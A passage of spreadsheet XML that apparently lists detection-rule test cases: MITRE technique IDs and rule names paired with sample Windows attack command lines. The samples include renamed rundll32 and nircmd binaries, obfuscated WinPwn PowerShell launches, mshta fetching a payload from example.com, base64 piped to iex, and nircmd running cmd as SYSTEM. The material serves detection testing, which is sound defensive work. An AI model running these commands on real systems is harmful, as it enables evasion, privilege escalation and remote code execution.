      <c r="E3922" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe not_rundll.exe &amp;&amp; not_rundll.exe</t>
        </is>
      </c>
      <c r="F3922" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3922" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3922" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3922" s="43" t="n"/>
      <c r="J3922" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3922" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3923" ht="15.75" customHeight="1" s="42">
      <c r="A3923" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3923" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C3923" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D3923" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E3923" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe not_rundll32.exe &amp;&amp; not_rundll32.exe</t>
        </is>
      </c>
      <c r="F3923" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3923" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3923" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3923" s="43" t="n"/>
      <c r="J3923" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3923" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3924" ht="15.75" customHeight="1" s="42">
      <c r="A3924" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3924" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3924" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3924" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3924" s="43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F3924" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3924" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3924" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3924" s="43" t="n"/>
      <c r="J3924" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3924" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3925" ht="15.75" customHeight="1" s="42">
      <c r="A3925" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3925" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3925" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3925" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3925" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "&amp; ("W`inP`wn.ps1" -replace '`', '') -noninteractive"</t>
        </is>
      </c>
      <c r="F3925" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3925" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3925" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3925" s="43" t="n"/>
      <c r="J3925" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3925" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3926" ht="15.75" customHeight="1" s="42">
      <c r="A3926" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3926" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3926" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3926" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3926" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (Resolve-Path (".\Win" + "Pwn.ps1")) -noninteractive"</t>
        </is>
      </c>
      <c r="F3926" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3926" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3926" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3926" s="43" t="n"/>
      <c r="J3926" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3926" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3927" ht="15.75" customHeight="1" s="42">
      <c r="A3927" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3927" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3927" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3927" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3927" s="43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F3927" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3927" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3927" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3927" s="43" t="n"/>
      <c r="J3927" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3927" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3928" ht="15.75" customHeight="1" s="42">
      <c r="A3928" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B3928" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C3928" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D3928" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E3928" s="43" t="inlineStr">
        <is>
          <t>C:\\WINNT\\system32\\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F3928" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3928" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3928" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3928" s="43" t="n"/>
      <c r="J3928" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3928" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3929" ht="15.75" customHeight="1" s="42">
      <c r="A3929" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3929" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3929" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3929" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3929" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\payload.png.hta"</t>
        </is>
      </c>
      <c r="F3929" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3929" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3929" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3929" s="43" t="n"/>
      <c r="J3929" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3929" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3930" ht="15.75" customHeight="1" s="42">
      <c r="A3930" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3930" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3930" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3930" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3930" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:new%20ActiveXObject('WScript.Shell').Run('calc.exe');window.close();"</t>
        </is>
      </c>
      <c r="F3930" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3930" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3930" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3930" s="43" t="n"/>
      <c r="J3930" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3930" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3931" ht="15.75" customHeight="1" s="42">
      <c r="A3931" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3931" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3931" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3931" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3931" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "http://example.com/payload.hta"</t>
        </is>
      </c>
      <c r="F3931" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3931" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3931" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3931" s="43" t="n"/>
      <c r="J3931" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3931" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3932" ht="15.75" customHeight="1" s="42">
      <c r="A3932" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3932" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3932" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3932" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3932" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\payload.hta"</t>
        </is>
      </c>
      <c r="F3932" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3932" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3932" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3932" s="43" t="n"/>
      <c r="J3932" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3932" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3933" ht="15.75" customHeight="1" s="42">
      <c r="A3933" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3933" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3933" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3933" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3933" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F3933" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3933" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3933" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3933" s="43" t="n"/>
      <c r="J3933" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3933" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3934" ht="15.75" customHeight="1" s="42">
      <c r="A3934" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3934" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3934" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3934" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3934" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F3934" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3934" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3934" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3934" s="43" t="n"/>
      <c r="J3934" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3934" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3935" ht="15.75" customHeight="1" s="42">
      <c r="A3935" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3935" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3935" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3935" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3935" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( 'd2hvYW1p' )"</t>
        </is>
      </c>
      <c r="F3935" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3935" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3935" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3935" s="43" t="n"/>
      <c r="J3935" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3935" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3936" ht="15.75" customHeight="1" s="42">
      <c r="A3936" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3936" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3936" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3936" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3936" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([String]::new('d2hvYW1p'))"</t>
        </is>
      </c>
      <c r="F3936" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3936" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3936" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3936" s="43" t="n"/>
      <c r="J3936" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3936" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3937" ht="15.75" customHeight="1" s="42">
      <c r="A3937" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3937" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3937" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3937" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3937" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( [System.Text.Encoding]::UTF8.GetString([System.Text.Encoding]::UTF8.GetBytes('d2hvYW1p')) )"</t>
        </is>
      </c>
      <c r="F3937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3937" s="43" t="n"/>
      <c r="J3937" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3937" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3938" ht="15.75" customHeight="1" s="42">
      <c r="A3938" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3938" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3938" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3938" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3938" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( ( 'd2hv' + 'YW1p' ) )"</t>
        </is>
      </c>
      <c r="F3938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3938" s="43" t="n"/>
      <c r="J3938" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3938" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3939" ht="15.75" customHeight="1" s="42">
      <c r="A3939" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3939" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3939" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3939" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3939" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( (Get-Content 'C:\base64.txt') )"</t>
        </is>
      </c>
      <c r="F3939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3939" s="43" t="n"/>
      <c r="J3939" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3939" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3940" ht="15.75" customHeight="1" s="42">
      <c r="A3940" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3940" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3940" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3940" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3940" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( (Get-Content 'C:\base64.txt') ) | iex"</t>
        </is>
      </c>
      <c r="F3940" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3940" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3940" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3940" s="43" t="n"/>
      <c r="J3940" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3940" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3941" ht="15.75" customHeight="1" s="42">
      <c r="A3941" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3941" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_start_service</t>
        </is>
      </c>
      <c r="C3941" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D3941" s="43" t="inlineStr">
        <is>
          <t>2a072a96-a086-49fa-bcb5-15cc5a619093</t>
        </is>
      </c>
      <c r="E3941" s="43" t="inlineStr">
        <is>
          <t>net start sesshijack</t>
        </is>
      </c>
      <c r="F3941" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3941" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3941" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3941" s="43" t="n"/>
      <c r="J3941" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3941" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3942" ht="15.75" customHeight="1" s="42">
      <c r="A3942" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3942" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C3942" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D3942" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E3942" s="43" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\nircmd.exe  win child class Shell_TrayWnd hide class TrayClockWClass</t>
        </is>
      </c>
      <c r="F3942" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3942" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3942" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3942" s="43" t="n"/>
      <c r="J3942" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3942" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3943" ht="15.75" customHeight="1" s="42">
      <c r="A3943" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3943" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C3943" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D3943" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E3943" s="43" t="inlineStr">
        <is>
          <t>copy nircmd.exe sys_utility.exe &amp;&amp; sys_utility.exe win min process itunes.exe</t>
        </is>
      </c>
      <c r="F3943" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3943" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3943" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3943" s="43" t="n"/>
      <c r="J3943" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3943" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3944" ht="15.75" customHeight="1" s="42">
      <c r="A3944" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3944" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C3944" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D3944" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E3944" s="43" t="inlineStr">
        <is>
          <t>n.exe "e""x""e""c" "h""i""d""e" notepad.exe</t>
        </is>
      </c>
      <c r="F3944" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3944" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3944" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3944" s="43" t="n"/>
      <c r="J3944" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3944" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3945" ht="15.75" customHeight="1" s="42">
      <c r="A3945" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3945" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C3945" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D3945" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E3945" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe execmd run calc.exe</t>
        </is>
      </c>
      <c r="F3945" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3945" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3945" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3945" s="43" t="n"/>
      <c r="J3945" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3945" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3946" ht="15.75" customHeight="1" s="42">
      <c r="A3946" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3946" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3946" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3946" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3946" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe" runassystem "cmd.exe</t>
        </is>
      </c>
      <c r="F3946" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3946" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3946" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3946" s="43" t="n"/>
      <c r="J3946" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3946" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3947" ht="15.75" customHeight="1" s="42">
      <c r="A3947" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3947" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3947" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3947" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3947" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe runassystem "cmd.exe</t>
        </is>
      </c>
      <c r="F3947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3947" s="43" t="n"/>
      <c r="J3947" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3947" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3948" ht="15.75" customHeight="1" s="42">
      <c r="A3948" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3948" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3948" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3948" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3948" s="43" t="inlineStr">
        <is>
          <t>copy nircmd.exe n.exe &amp;&amp; n.exe runassystem cmd.exe</t>
        </is>
      </c>
      <c r="F3948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3948" s="43" t="n"/>
      <c r="J3948" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3948" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3949" ht="15.75" customHeight="1" s="42">
      <c r="A3949" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3949" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3949" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3949" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3949" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe runassystem C:\Windows\System32\cmd.exe</t>
        </is>
      </c>
      <c r="F3949" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3949" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3949" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3949" s="43" t="n"/>
      <c r="J3949" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3949" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3950" ht="15.75" customHeight="1" s="42">
      <c r="A3950" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3950" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3950" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3950" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3950" s="43" t="inlineStr">
        <is>
